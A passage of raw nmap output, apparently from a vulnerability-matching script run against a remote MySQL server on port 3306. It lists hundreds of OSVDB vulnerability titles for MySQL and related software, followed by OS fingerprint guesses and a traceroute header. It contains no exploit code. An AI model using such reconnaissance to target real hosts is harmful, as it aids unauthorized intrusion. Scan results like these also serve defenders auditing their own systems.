11307| [86271] Oracle MySQL Server Server Full Text Search Subcomponent Unspecified Remote DoS
11308| [86270] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-3156)
11309| [86269] Oracle MySQL Server MySQL Client Subcomponent Unspecified Remote Information Disclosure
11310| [86268] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-3180)
11311| [86267] Oracle MySQL Server Server Optimizer Subcomponent Unspecified Remote DoS (2012-3150)
11312| [86266] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-3144)
11313| [86265] Oracle MySQL Server InnoDB Plugin Subcomponent Unspecified Remote DoS
11314| [86264] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
11315| [86263] Oracle MySQL Server MySQL Client Subcomponent Unspecified Remote Issue
11316| [86262] Oracle MySQL Server Server Subcomponent Unspecified Remote DoS (2012-3177)
11317| [86261] Oracle MySQL Server Protocol Subcomponent Unspecified Remote Issue
11318| [86260] Oracle MySQL Server Information Schema Subcomponent Unspecified Remote Code Execution
11319| [86175] Oracle MySQL on Windows Path Subversion Arbitrary DLL Injection Code Execution
11320| [85155] Icinga module/idoutils/db/scripts/create_mysqldb.sh Icinga User Database Access Restriction Bypass
11321| [84755] Oracle MySQL Sort Order Index Calculation Remote DoS
11322| [84719] MySQLDumper index.php page Parameter XSS
11323| [84680] MySQL Squid Access Report access.log File Path XSS
11324| [83980] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2012-1689)
11325| [83979] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2012-1734)
11326| [83978] Oracle MySQL Server Subcomponent Unspecified Remote DoS
11327| [83977] Oracle MySQL Server InnoDB Subcomponent Unspecified Remote DoS
11328| [83976] Oracle MySQL Server GIS Extension Subcomponent Unspecified Remote DoS
11329| [83975] Oracle MySQL Server Optimizer Subcomponent Unspecified Remote DoS (2012-1735)
11330| [83661] Oracle MySQL Unspecified Issue (59533)
11331| [82804] Oracle MySQL Authentication Protocol Token Comparison Casting Failure Password Bypass
11332| [82803] Oracle MySQL Unspecified Issue (59387)
11333| [82120] Oracle MySQL Version Specific Comment Handling Arbitrary SQL Command Execution
11334| [81897] Viscacha classes/database/mysql.inc.php Multiple Parameter SQL Injection
11335| [81616] MySQLDumper Multiple Script Direct Request Information Disclosure
11336| [81615] MySQLDumper filemanagement.php f Parameter Traversal Arbitrary File Access
11337| [81614] MySQLDumper File Upload PHP Code Execution
11338| [81613] MySQLDumper main.php Multiple Function CSRF
11339| [81612] MySQLDumper restore.php filename Parameter XSS
11340| [81611] MySQLDumper sql.php Multiple Parameter XSS
11341| [81610] MySQLDumper install.php Multiple Parameter XSS
11342| [81609] MySQLDumper install.php language Parameter Traversal Arbitrary File Access
11343| [81378] Oracle MySQL Server Server Optimizer Component Unspecified Remote DoS (2012-1690)
11344| [81377] Oracle MySQL Server Server Optimizer Component Unspecified Remote DoS (2012-1696)
11345| [81376] Oracle MySQL Server Server DML Component Unspecified Remote DoS
11346| [81375] Oracle MySQL Server Partition Component Unspecified Remote DoS
11347| [81374] Oracle MySQL Server MyISAM Component Unspecified Remote DoS
11348| [81373] Oracle MySQL Server Server Optimizer Component Unspecified Remote DoS (2012-1703)
11349| [81059] Oracle MySQL Server Multiple Unspecified Issues
11350| [79038] Webmin Process Listing MySQL Password Local Disclosure
11351| [78919] Oracle MySQL Unspecified Pre-authentication Remote Code Execution
11352| [78710] WordPress wp-admin/setup-config.php MySQL Query Saturation Brute-Force Proxy Weakness
11353| [78708] WordPress wp-admin/setup-config.php MySQL Database Verification Code Injection Weakness
11354| [78707] WordPress wp-admin/setup-config.php MySQL Credentials Error Message Brute-Force Weakness
11355| [78394] Oracle MySQL Server Unspecified Remote DoS (2012-0493)
11356| [78393] Oracle MySQL Server Unspecified Remote DoS (2012-0492)
11357| [78392] Oracle MySQL Server Unspecified Remote DoS (2012-0117)
11358| [78391] Oracle MySQL Server Unspecified Remote DoS (2012-0112)
11359| [78390] Oracle MySQL Server Unspecified Remote DoS (2012-0495)
11360| [78389] Oracle MySQL Server Unspecified Remote DoS (2012-0491)
11361| [78388] Oracle MySQL Server Unspecified Remote DoS (2012-0490)
11362| [78387] Oracle MySQL Server Unspecified Remote DoS (2012-0489)
11363| [78386] Oracle MySQL Server Unspecified Remote DoS (2012-0488)
11364| [78385] Oracle MySQL Server Unspecified Remote DoS (2012-0487)
11365| [78384] Oracle MySQL Server Unspecified Remote DoS (2012-0486)
11366| [78383] Oracle MySQL Server Unspecified Remote DoS (2012-0485)
11367| [78382] Oracle MySQL Server Unspecified Remote DoS (2012-0120)
11368| [78381] Oracle MySQL Server Unspecified Remote DoS (2012-0119)
11369| [78380] Oracle MySQL Server Unspecified Remote DoS (2012-0115)
11370| [78379] Oracle MySQL Server Unspecified Remote DoS (2012-0102)
11371| [78378] Oracle MySQL Server Unspecified Remote DoS (2012-0101)
11372| [78377] Oracle MySQL Server Unspecified Remote DoS (2012-0087)
11373| [78376] Oracle MySQL Server Unspecified Remote DoS (2011-2262)
11374| [78375] Oracle MySQL Server Unspecified Local DoS
11375| [78374] Oracle MySQL Server Unspecified Remote Issue (2012-0075)
11376| [78373] Oracle MySQL Server Unspecified Local Issue
11377| [78372] Oracle MySQL Server Unspecified Remote Information Disclosure
11378| [78371] Oracle MySQL Server Unspecified Remote Issue (2012-0496)
11379| [78370] Oracle MySQL Server Unspecified Remote Issue (2012-0118)
11380| [78369] Oracle MySQL Server Unspecified Remote Issue (2012-0116)
11381| [78368] Oracle MySQL Server Unspecified Remote Issue (2012-0113)
11382| [78283] Oracle MySQL NULL Pointer Dereference Packet Parsing Remote DoS
11383| [77042] e107 CMS install_.php MySQL Server Name Parsing Remote PHP Code Execution
11384| [77040] DBD::mysqlPP Unspecified SQL Injection
11385| [75888] TaskFreak! multi-mysql Multiple Script Direct Request Path Disclosure
11386| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
11387| [73555] Prosody MySQL Value Column Invalid Data Type Handling DoS
11388| [73387] Zend Framework PDO_MySql Character Set Security Bypass
11389| [72836] Arctic Fox CMS Multiple Script Direct Request MySQL Settings Disclosure
11390| [72660] MySQL GUI Tools Administrator / Query Browser Command Line Credentials Local Disclosure
11391| [72120] DirectAdmin mysql_backups Folder MySQL Database Backup Local Disclosure
11392| [71368] Accellion File Transfer Appliance Weak MySQL root Password
11393| [70967] MySQL Eventum Admin User Creation CSRF
11394| [70966] MySQL Eventum preferences.php full_name Parameter XSS
11395| [70961] MySQL Eventum list.php Multiple Parameter XSS
11396| [70960] MySQL Eventum forgot_password.php URI XSS
11397| [70947] PyWebDAV DAVServer/mysqlauth.py get_userinfo() Multiple Parameter SQL Injection
11398| [70610] PHP MySQLi Extension set_magic_quotes_runtime Function mysqli_fetch_assoc Function Interaction Weakness
11399| [69885] SilverStripe modules/sapphire/trunk/core/model/MySQLDatabase.php showqueries Parameter SQL Command Disclosure
11400| [69395] MySQL Derived Table Grouping DoS
11401| [69394] MySQL Temporary Table Expression Re-Evaluation DoS
11402| [69393] MySQL GROUP_CONCAT() WITH ROLLUP Modifier DoS
11403| [69392] MySQL Extreme-Value Functions Mixed Arguments DoS
11404| [69391] MySQL Stored Procedures / Prepared Statements Nested Joins DoS
11405| [69390] MySQL Extreme-Value Functions Argument Parsing Type Error DoS
11406| [69389] MySQL CONVERT_TZ() Function Empty SET Column DoS
11407| [69388] MySQL InnoDB Storage Engine Table Handling Overflow
11408| [69387] MySQL LIKE Predicates Pre-Evaluation DoS
11409| [69001] MySQL PolyFromWKB() Function WKB Data Remote DoS
11410| [69000] MySQL HANDLER Interface Unspecified READ Request DoS
11411| [68997] MySQL Prepared-Statement Mode EXPLAIN DoS
11412| [68996] MySQL EXPLAIN EXTENDED Statement DoS
11413| [68995] MySQL GeometryCollection non-Geometry Value Assignment DoS
11414| [67488] phpMyAdmin libraries/dbi/mysqli.dbi.lib.php Unspecified Parameter XSS
11415| [67487] phpMyAdmin libraries/dbi/mysql.dbi.lib.php Unspecified Parameter XSS
11416| [67421] PHP Mysqlnd Extension mysqlnd_wireprotocol.c php_mysqlnd_rset_header_read Function Overflow
11417| [67420] PHP Mysqlnd Extension mysqlnd_wireprotocol.c php_mysqlnd_ok_read Function Arbitrary Memory Content Disclosure
11418| [67419] PHP Mysqlnd Extension php_mysqlnd_read_error_from_line Function Negative Buffer Length Value Overflow
11419| [67418] PHP Mysqlnd Extension php_mysqlnd_auth_write Function Multiple Overflows
11420| [67384] MySQL LOAD DATA INFILE Statement Incorrect OK Packet DoS
11421| [67383] MySQL EXPLAIN Statement Item_singlerow_subselect::store Function NULL Dereference DoS
11422| [67381] MySQL InnoDB Temporary Table Handling DoS
11423| [67380] MySQL BINLOG Statement Unspecified Argument DoS
11424| [67379] MySQL Multiple Operation NULL Argument Handling DoS
11425| [67378] MySQL Unique SET Column Join Statement Remote DoS
11426| [67377] MySQL DDL Statement Multiple Configuration Parameter DoS
11427| [66800] PHP Multiple mysqlnd_* Function Unspecified Overflow
11428| [66799] PHP mysqlnd Error Packet Handling Multiple Overflows
11429| [66731] PHP Bundled MySQL Library Unspecified Issue
11430| [66665] PHP MySQL LOAD DATA LOCAL open_basedir Bypass
11431| [65851] MySQL ALTER DATABASE #mysql50# Prefix Handling DoS
11432| [65450] phpGraphy mysql_cleanup.php include_path Parameter Remote File Inclusion
11433| [65085] MySQL Enterprise Monitor Unspecified CSRF
11434| [64843] MySQL DROP TABLE Command Symlink MyISAM Table Local Data Deletion
11435| [64588] MySQL sql/net_serv.cc my_net_skip_rest Function Large Packet Handling Remote DoS
11436| [64587] MySQL COM_FIELD_LIST Command Packet Table Name Argument Overflow
11437| [64586] MySQL COM_FIELD_LIST Command Packet Authentication Bypass
11438| [64524] Advanced Poll misc/get_admin.php mysql_host Parameter XSS
11439| [64447] Tirzen Framework (TZN) tzn_mysql.php Username Parameter SQL Injection Authentication Bypass
11440| [64320] ClanSphere MySQL Driver s_email Parameter SQL Injection
11441| [63903] MySQL sql/sql_plugin.cc mysql_uninstall_plugin Function UNINSTALL PLUGIN Command Privilege Check Weakness
11442| [63115] Quicksilver Forums mysqldump Process List Database Password Disclosure
11443| [62830] Employee Timeclock Software mysqldump Command-line Database Password Disclosure
11444| [62640] PHP mysqli_real_escape_string() Function Error Message Path Disclosure
11445| [62216] Flex MySQL Connector ActionScript SQL Query Arbitrary Code Execution
11446| [61752] kiddog_mysqldumper Extension for TYPO3 Unspecified Information Disclosure
11447| [61497] microTopic admin/mysql.php rating Parameter SQL Injection
11448| [60665] MySQL CREATE TABLE MyISAM Table mysql_unpacked_real_data_home Local Restriction Bypass
11449| [60664] MySQL sql/sql_table.cc Data Home Directory Symlink CREATE TABLE Access Restriction Bypass
11450| [60516] RADIO istek scripti estafresgaftesantusyan.inc Direct Request MySQL Database Credentials Disclosure
11451| [60489] MySQL GeomFromWKB() Function First Argument Geometry Value Handling DoS
11452| [60488] MySQL SELECT Statement WHERE Clause Sub-query DoS
11453| [60487] MySQL vio_verify_callback() Function Crafted Certificate MiTM Weakness
11454| [60356] MySql Client Library (libmysqlclient) mysql_real_connect Function Local Overflow
11455| [59907] MySQL on Windows bind-address Remote Connection Weakness
11456| [59906] MySQL on Windows Default Configuration Logging Weakness
11457| [59616] MySQL Hashed Password Weakness
11458| [59609] Suckbot mod_mysql_logger Shared Object Unspecified Remote DoS
11459| [59495] Cyrus SASL LDAP / MySQL Authentication Patch password Field SQL Injection Authentication Bypass
11460| [59062] phpMyAdmin Extension for TYPO3 MySQL Table Name Unspecified XSS
11461| [59045] phpMyAdmin Crafted MYSQL Table Name XSS
11462| [59030] mysql-ocaml for MySQL mysql_real_escape_string() Function Character Escaping Weakness
11463| [57587] Zmanda Recovery Manager for MySQL socket-server.pl system() Function Local Privilege Escalation
11464| [57586] Zmanda Recovery Manager for MySQL socket-server.pl system() Function Remote Shell Command Execution
11465| [56741] MySQL Connector/J Unicode w/ SJIS/Windows-31J Charset SQL Injection
11466| [56134] Virtualmin MySQL Module Execute SQL Feature Arbitrary File Access
11467| [55734] MySQL sql_parse.cc dispatch_command() Function Format String DoS
11468| [55566] MySQL Connector/NET SSL Certificate Verification Weakness
11469| [53525] MyBlog /config/mysqlconnection.inc Direct Request Information Disclosure
11470| [53524] blog+ includes/window_top.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
11471| [53523] blog+ includes/block_center_down.php row_mysql_blocks_center_down[file] Parameter Traversal Local File Inclusion
11472| [53522] blog+ includes/block_center_top.php row_mysql_blocks_center_top[file] Parameter Traversal Local File Inclusion
11473| [53521] blog+ includes/block_left.php row_mysql_blocks_left[file] Parameter Traversal Local File Inclusion
11474| [53520] blog+ includes/block_right.php row_mysql_blocks_right[file] Parameter Traversal Local File Inclusion
11475| [53519] blog+ includes/window_down.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
11476| [53366] GEDCOM_TO_MYSQL php/info.php Multiple Parameter XSS
11477| [53365] GEDCOM_TO_MYSQL php/index.php nom_branche Parameter XSS
11478| [53364] GEDCOM_TO_MYSQL php/prenom.php Multiple Parameter XSS
11479| [53360] Blogplus includes/window_top.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
11480| [53359] Blogplus includes/window_down.php row_mysql_bloginfo[theme] Parameter Traversal Local File Inclusion
11481| [53358] Blogplus includes/block_right.php row_mysql_blocks_right[file] Parameter Traversal Local File Inclusion
11482| [53357] Blogplus includes/block_left.php row_mysql_blocks_left[file] Parameter Traversal Local File Inclusion
11483| [53356] Blogplus block_center_top.php row_mysql_blocks_center_top[file] Parameter Traversal Local File Inclusion
11484| [53355] Blogplus includes/block_center_down.php row_mysql_blocks_center_down[file] Parameter Traversal Local File Inclusion
11485| [53110] XOOPS Cube Legacy ErrorHandler::show() Function MySQL Error Message XSS
11486| [52729] Asterisk-addon cdr_addon_mysql.c Call Detail Record SQL Injection
11487| [52728] Tribox cdr_addon_mysql.c Call Detail Record XSS
11488| [52727] FreePBX cdr_addon_mysql.c Call Detail Record XSS
11489| [52726] Areski cdr_addon_mysql.c Call Detail Record XSS
11490| [52464] MySQL charset Column Truncation Weakness
11491| [52453] MySQL sql/item_xmlfunc.cc ExtractValue() / UpdateXML() Functions Scalar XPath DoS
11492| [52378] Cisco ANM MySQL root Account Default Password
11493| [52264] Broadcast Machine MySQLController.php controllers/baseDir Parameter Remote File Inclusion
11494| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
11495| [51171] MySQL InnoDB convert_search_mode_to_innobase Function DoS
11496| [50892] MySQL Calendar index.php username Parameter SQL Injection
11497| [50827] Nodstrum MySQL Calendar nodstrumCalendarV2 Cookie Manipulation Admin Authentication Bypass
11498| [49875] PromoteWeb MySQL go.php id Parameter SQL Injection
11499| [48710] MySQL Command Line Client HTML Output XSS
11500| [48709] MySQL Quick Admin actions.php lang Parameter Traversal Local File Inclusion
11501| [48708] MySQL Quick Admin index.php language Cookie Traversal Local File Inclusion
11502| [48021] MySQL Empty Bit-String Literal Token SQL Statement DoS
11503| [47789] mysql-lists Unspecified XSS
11504| [47394] Keld PHP-MySQL News Script login.php username Parameter SQL Injection
11505| [45073] MySQLDumper Extension for TYPO3 Unspecified Authentication Bypass
11506| [44937] MySQL MyISAM Table CREATE TABLE Privilege Check Bypass
11507| [44138] Debian GNU/Linux libdspam7-drv-mysql Cron MySQL dspam Database Password Local Disclosure
11508| [44071] Phorum /include/db/mysql.php Unspecified Search SQL Injection
11509| [43180] MySQL sql_select.cc INFORMATION_SCHEMA Table Crafted Query Remote DoS
11510| [43179] MySQL Server BINLOG Statement Rights Checking Failure
11511| [42610] MySQL DEFINER View Value Crafted Statements Remote Privilege Escalation
11512| [42609] MySQL Federated Engine SHOW TABLE STATUS Query Remote DoS
11513| [42608] MySQL RENAME TABLE Symlink System Table Overwrite
11514| [42607] MySQL Multiple table-level DIRECTORY Remote Privilege Escalation
11515| [42460] MySQLDumper HTTP POST Request Remote Authentication Bypass
11516| [42423] AdventNet EventLog Analyzer MySQL Installation Default root Account
11517| [41861] Bacula make_catalog_backup Function MySQL Director Password Cleartext Disclosure
11518| [40232] PHP MySQL Banner Exchange inc/lib.inc Direct Request Database Disclosure
11519| [40188] Password Manager Pro (PMP) mysql Unspecified Remote Command Injection
11520| [39279] PHP mysql_error() Function XSS
11521| [39145] aurora framework db_mysql.lib pack_var() value Parameter SQL Injection
11522| [38567] NetClassifieds Mysql_db.php Halt_On_Error Setting Error Message Path Disclosure
11523| [38112] Excel Parser Pro sample/xls2mysql parser_path Parameter Remote File Inclusion
11524| [37880] Asterisk-Addons source/destination Numbers cdr_addon_mysql Module SQL Injection
11525| [37784] PHP MySQL Extension Multiple Function Security Restriction Bypass
11526| [37783] MySQL Community Server CREATE TABLE LIKE Table Structure Disclosure
11527| [37782] MySQL Community Server External Table View Privilege Escalation
11528| [37781] MySQL ALTER TABLE Information Disclosure
11529| [37539] GPL PHP Board db.mysql.inc.php root_path Parameter Remote File Inclusion
11530| [37195] Eve-Nuke Module for PHP-Nuke db/mysql.php phpbb_root_path
11531| [37015] paBugs class.mysql.php path_to_bt_dir Parameter Remote File Inclusion
11532| [36868] PHP MySQLi Extension LOCAL INFILE Operation Security Restriction Bypass
11533| [36867] PHP MySQL Extension LOCAL INFILE Operation Security Restriction Bypass
11534| [36771] InterWorx-CP SiteWorx mysql.php PATH_INFO Parameter XSS
11535| [36757] InterWorx-CP NodeWorx mysql.php PATH_INFO Parameter XSS
11536| [36732] MySQL Community Server Connection Protocol Malformed Password Packet Remote DoS
11537| [36251] Associated Press (AP) Newspower Default MySQL root Password
11538| [35168] Study Planner (Studiewijzer) db/mysql/db.inc.php SPL_CFG[dirroot] Parameter Remote File Inclusion
11539| [35037] Fantastico for cPanel includes/mysqlconfig.php fantasticopath Parameter Traversal Local File Inclusion
11540| [34780] Backup Manager Command Line Cleartext MySQL Password Disclosure
11541| [34766] MySQL RENAME TABLE Statement Arbitrary Table Name Modification
11542| [34765] MySQL mysql_change_db Function THD::db_access Privilege Escalation
11543| [34734] MySQL Crafted IF Clause Divide-by-zero NULL Dereference DoS
11544| [34038] MySQL Commander ressourcen/dbopen.php home Parameter Remote File Inclusion
11545| [33974] MySQL information_schema Table Subselect Single-Row DoS
11546| [33678] MySQLNewsEngine affichearticles.php3 newsenginedir Parameter Remote File Inclusion
11547| [33447] WGS-PPC (PPC Search Engine) config/mysql_config.php INC Parameter Remote File Inclusion
11548| [33372] deV!L'z Clanportal inc/filebrowser/browser.php MySQL Data Disclosure
11549| [33147] ActiveCalendar data/mysqlevents.php css Parameter XSS
11550| [32784] Storystream mysqli.php baseDir Parameter Remote File Inclusion
11551| [32783] Storystream mysql.php baseDir Parameter Remote File Inclusion
11552| [32421] Contenido CMS conlib/db_mysqli.inc Direct Request Path Disclosure
11553| [32272] JevonCMS /phplib/db_mysql.inc Direct Request Path Disclosure
11554| [32171] Blue Magic Board db_mysql_error.php Direct Request Path Disclosure
11555| [32056] BTSaveMySql Direct Request Config File Disclosure
11556| [32044] cPanel WebHost Manager (WHM) scripts/passwdmysql password Parameter XSS
11557| [32024] TikiWiki tiki-wiki_rss.php ver MySQL Credential Disclosure
11558| [31963] Agora MysqlfinderAdmin.php _SESSION[PATH_COMPOSANT] Parameter Remote File Inclusion
11559| [31431] ZoomStats libs/dbmax/mysql.php GLOBALS[lib][db][path] Parameter Remote File Inclusion
11560| [30172] TikiWiki Multiple Script Empty sort_mode Parameter MySQL Authentication Credential Disclosure
11561| [29696] MySQLDumper sql.php db Parameter XSS
11562| [29453] ConPresso CMS db_mysql.inc.php msg Parameter XSS
11563| [29122] cPanel mysqladmin/hooksadmin Unspecified Privilege Escalation
11564| [28296] MySQL Crafted multiupdate / subselects Query Local DoS
11565| [28288] MySQL Instance_options::complete_initialization Function Overflow
11566| [28030] Tutti Nova class.novaRead.mysql.php TNLIB_DIR Parameter Remote File Inclusion
11567| [28029] Tutti Nova class.novaAdmin.mysql.php TNLIB_DIR Parameter Remote File Inclusion
11568| [28028] Tutti Nova class.novaEdit.mysql.php TNLIB_DIR Parameter Remote File Inclusion
11569| [28013] MySQL SUID Routine Miscalculation Arbitrary DML Statement Execution
11570| [28012] MySQL Case Sensitivity Unauthorized Database Creation
11571| [27919] MySQL VIEW Access information_schema.views Information Disclosure
11572| [27703] MySQL MERGE Table Privilege Persistence
11573| [27593] Drupal database.mysqli.inc Multiple Parameter SQL Injection
11574| [27549] Opsware NAS /etc/init.d/mysqll MySQL root Cleartext Password Local Disclosure
11575| [27416] MySQL Server time.cc date_format Function Format String
11576| [27054] MySQL mysqld str_to_date Function NULL Argument DoS
11577| [26923] PHP/MySQL Classifieds (PHP Classifieds) search.php rate Parameter SQL Injection
11578| [26922] PHP/MySQL Classifieds (PHP Classifieds) AddAsset1.php Multiple Field XSS
11579| [26822] Bee-hive Lite include/listall.inc.php mysqlcall Parameter Remote File Inclusion
11580| [26821] Bee-hive Lite conad/include/mysqlCall.inc.php config Parameter Remote File Inclusion
11581| [26820] Bee-hive Lite conad/logout.inc.php mysqlCall Parameter Remote File Inclusion
11582| [26819] Bee-hive Lite conad/login.inc.php mysqlCall Parameter Remote File Inclusion
11583| [26818] Bee-hive Lite conad/checkPasswd.inc.php mysqlCall Parameter Remote File Inclusion
11584| [26817] Bee-hive Lite conad/changeUserDetails.inc.php mysqlCall Parameter Remote File Inclusion
11585| [26816] Bee-hive Lite conad/changeEmail.inc.php mysqlCall Parameter Remote File Inclusion
11586| [26125] Open Searchable Image Catalogue core.php do_mysql_query Function Error Message XSS
11587| [26123] Open Searchable Image Catalogue core.php do_mysql_query Function SQL Injection
11588| [25987] MySQL Multibyte Encoding SQL Injection Filter Bypass
11589| [25908] Drupal database.mysql.inc Multiple Parameter SQL Injection
11590| [25595] Apple Mac OS X MySQL Manager Blank root Password
11591| [25228] MySQL Crafted COM_TABLE_DUMP Request Arbitrary Memory Disclosure
11592| [25227] MySQL COM_TABLE_DUMP Packet Overflow
11593| [25226] MySQL Malformed Login Packet Remote Memory Disclosure
11594| [24245] Cholod Mysql Based Message Board Unspecified XSS
11595| [24244] Cholod Mysql Based Message Board mb.cgi showmessage Action SQL Injection
11596| [23963] WoltLab Burning Board class_db_mysql.php SQL Error Message XSS
11597| [23915] Netcool/NeuSecure MySQL Database Connection Restriction Bypass
11598| [23611] Aztek Forum index.php msg Variable Forced MySQL Error Information Disclosure
11599| [23526] MySQL Query NULL Charcter Logging Bypass
11600| [23157] PHP/MYSQL Timesheet changehrs.php Multiple Parameter SQL Injection
11601| [23156] PHP/MYSQL Timesheet index.php Multiple Parameter SQL Injection
11602| [22995] PAM-MySQL Authentication pam_get_item() Function Unspecified Privilege Escalation
11603| [22994] PAM-MySQL SQL Logging Facility Segfault DoS
11604| [22485] Recruitment Software admin/site.xml MySQL Authentication Credential Disclosure
11605| [22479] PHP mysqli Extension Error Message Format String
11606| [22232] PHP Pipe Variable mysql_connect() Function Overflow
11607| [21685] MySQL Auction Search Module keyword XSS
11608| [20698] Campsite notifyendsubs Cron MySQL Password Cleartext Remote Disclosure
11609| [20145] Proofpoint Protection Server Embedded MySQL Server Unpassworded root Account
11610| [19457] aMember Pro mysql.inc.php Remote File Inclusion
11611| [19377] MAXdev MD-Pro /MySQL_Tools/admin.php Path Disclosure
11612| [18899] MySQL UDF Library Arbitrary Function Load Privilege Escalation
11613| [18898] MySQL UDF LoadLibraryEx Function Nonexistent Library Load DoS
11614| [18897] MySQL on Windows UDF Create Function Traversal Privilege Escalation
11615| [18896] MySQL User-Defined Function init_syms() Function Overflow
11616| [18895] MySQL libmysqlclient.so host Parameter Remote Overflow
11617| [18894] MySQL drop database Request Remote Overflow
11618| [18622] FunkBoard mysql_install.php Email Field Arbitrary PHP Code Injection
11619| [18620] FunkBoard mysql_install.php Admin/Database Password Manipulation
11620| [18406] MySQL Eventum releases.php SQL Injection
11621| [18405] MySQL Eventum custom_fields_graph.php SQL Injection
11622| [18404] MySQL Eventum custom_fields.php SQL Injection
11623| [18403] MySQL Eventum login.php email Parameter SQL Injection Authentication Bypass
11624| [18402] MySQL Eventum get_jsrs_data.php F Parameter XSS
11625| [18401] MySQL Eventum list.php release Parameter XSS
11626| [18400] MySQL Eventum view.php id Parameter XSS
11627| [18173] MySQL on Windows USE Command MS-DOS Device Name DoS
11628| [17801] Bugzilla MySQL Replication Race Condition Information Disclosure
11629| [17223] xMySQLadmin Symlink Arbitrary File Deletion
11630| [16727] MySQL Nonexistent '--user' Error Incorrect Privilege Database Invocation
11631| [16689] MySQL mysql_install_db Symlink Arbitrary File Overwrite
11632| [16056] Plans Unspecified mySQL Remote Password Disclosure
11633| [15993] MySQL MaxDB Webtool Remote getIfHeader() WebDAV Function Remote Overflow
11634| [15817] MySQL MaxDB Web Tool getLockTokenHeader() Function Remote Overflow
11635| [15816] MySQL MaxDB Web Administration Service Malformed GET Request Overflow
11636| [15451] paNews auth.php mysql_prefix Parameter SQL Injection
11637| [14748] MySQL MS-DOS Device Names Request DoS
11638| [14678] MySQL CREATE FUNCTION Arbitrary libc Code Execution
11639| [14677] MySQL CREATE FUNCTION mysql.func Table Arbitrary Library Injection
11640| [14676] MySQL CREATE TEMPORARY TABLE Symlink Privilege Escalation
11641| [14386] phpMyAdmin mysqli.dbi.lib.php Path Disclosure
11642| [14052] Symantec Brightmail AntiSpam Multiple Default MySQL Accounts
11643| [13086] MySQL MaxDB Web Agent Malformed HTTP Header DoS
11644| [13085] MySQL MaxDB Web Agent WebDAV sapdbwa_GetUserData() Function Remote DoS
11645| [13013] MySQL mysqlaccess.sh Symlink Arbitrary File Manipulation
11646| [12919] MySQL MaxDB WebAgent websql Remote Overflow
11647| [12779] MySQL User Defined Function Privilege Escalation
11648| [12609] MySQL Eventum projects.php Multiple Parameter XSS
11649| [12608] MySQL Eventum preferences.php Multiple Parameter XSS
11650| [12607] MySQL Eventum forgot_password.php email Parameter XSS
11651| [12606] MySQL Eventum index.php email Parameter XSS
11652| [12605] MySQL Eventum Default Vendor Account
11653| [12275] MySQL MaxDB Web Tools wahttp Nonexistent File Request DoS
11654| [12274] MySQL MaxDB Web Tools WebDAV Handler Remote Overflow
11655| [11689] Roxen Web Server MySQL Socket Permission Weakness
11656| [10985] MySQL MATCH..AGAINST Query DoS
11657| [10959] MySQL GRANT ALL ON Privilege Escalation
11658| [10660] MySQL ALTER TABLE/RENAME Forces Old Permission Checks
11659| [10659] MySQL ALTER MERGE Tables to Change the UNION DoS
11660| [10658] MySQL mysql_real_connect() Function Remote Overflow
11661| [10532] MySQL MaxDB webdbm Server Field DoS
11662| [10491] AWS MySQLguest AWSguest.php Script Insertion
11663| [10244] MySQL libmysqlclient Prepared Statements API Overflow
11664| [10226] MySQLGuest AWSguest.php Multiple Field XSS
11665| [9912] PHP safe_mode MySQL Database Access Restriction Bypass
11666| [9911] Inter7 vpopmail MySQL Module Authentication Credential Disclosure
11667| [9910] MySQL mysql_change_user() Double-free Memory Pointer DoS
11668| [9909] MySQL datadir/my.cnf Modification Privilege Escalation
11669| [9908] MySQL my.ini Initialization File datadir Parameter Overflow
11670| [9907] MySQL SELECT Statement String Handling Overflow
11671| [9906] MySQL GRANT Privilege Arbitrary Password Modification
11672| [9509] teapop MySQL Authentication Module SQL Injection
11673| [9018] MySQL Backup Pro getbackup() Method Unspecified Issue
11674| [9015] MySQL mysqlhotcopy Insecure Temporary File Creation
11675| [8997] Cacti config.php MySQL Authentication Credential Cleartext Disclosure
11676| [8979] MySQL SHOW GRANTS Encrypted Password Disclosure
11677| [8889] MySQL COM_TABLE_DUMP Package Negative Integer DoS
11678| [8888] MySQL COM_CHANGE_USER Command Long Repsonse Overflow
11679| [8887] MySQL COM_CHANGE_USER Command One Character Password Brute Force
11680| [8886] MySQL libmysqlclient Library read_one_row Overflow
11681| [8885] MySQL libmysqlclient Library read_rows Overflow
11682| [7476] MySQL Protocol 4.1 Authentication Scramble String Overflow
11683| [7475] MySQL Zero-length Scrambled String Crafted Packet Authentication Bypass
11684| [7245] MySQL Pluggable Authentication Module (pam_mysql) Password Disclosure
11685| [7128] MySQL show database Database Name Exposure
11686| [6716] MySQL Database Engine Weak Authentication Information Disclosure
11687| [6605] MySQL mysqld Readable Log File Information Disclosure
11688| [6443] PowerPhlogger db_dump.php View Arbitrary mySQL Dump
11689| [6421] MySQL mysqld_multi Symlink Arbitrary File Overwrite
11690| [6420] MySQL mysqlbug Symlink Arbitrary File Overwrite
11691| [2537] MySQL sql_acl.cc get_salt_from_password Function Password Handling Remote Overflow
11692| [2144] WinMySQLadmin my.ini Cleartext Password Disclosure
11693| [653] PCCS-Linux MySQL Database Admin Tool Authentication Credential Disclosure
11694| [520] MySQL Database Name Traversal Arbitrary File Modification
11695| [380] MySQL Server on Windows Default Null Root Password
11696| [261] MySQL Short Check String Authentication Bypass
11697|_
11698Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
11699Device type: general purpose
11700Running (JUST GUESSING): Linux 4.X|3.X|2.6.X (91%)
11701OS CPE: cpe:/o:linux:linux_kernel:4.4 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6
11702Aggressive OS guesses: Linux 4.4 (91%), Linux 3.10 - 3.12 (89%), Linux 4.9 (89%), Linux 2.6.18 - 2.6.22 (86%), Linux 3.10 - 3.16 (86%), Linux 4.0 (86%), Linux 3.10 - 4.11 (85%), Linux 3.11 - 4.1 (85%), Linux 3.18 (85%), Linux 3.2 - 4.9 (85%)
11703No exact OS matches for host (test conditions non-ideal).
11704Network Distance: 17 hops
11705
11706TRACEROUTE (using port 3306/tcp)
